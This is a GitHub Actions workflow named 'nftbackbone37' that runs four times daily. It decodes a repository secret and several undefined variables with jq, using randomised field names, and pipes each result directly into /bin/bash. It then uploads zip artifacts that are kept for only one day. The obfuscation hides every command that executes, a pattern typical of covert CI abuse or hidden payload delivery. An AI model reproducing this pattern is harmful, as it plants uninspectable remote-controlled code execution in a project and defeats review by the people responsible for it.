name: nftbackbone37
on:
  workflow_dispatch:

  schedule:
    - cron: '33 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nftbackbone37
        env:
          r0: ${{ secrets.r0 }}
        run: |
          printf '%s' "$r0" | jq -r .bxuzn9328 | /bin/bash
          echo $y79383 | jq -r .efgsx412 | /bin/bash
          printf '%s' "$nmm8243" | jq -r .wawe56213 | /bin/bash
          printf '%s' "$s8" | jq -r .f744 | /bin/bash
          printf '%s' "$lfkkq4" | jq -r .bco1643 | /bin/bash
          printf '%s' "$x6592" | jq -r .fu4 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: OXrhuBiK
          path: "*.zip"
          retention-days: 1
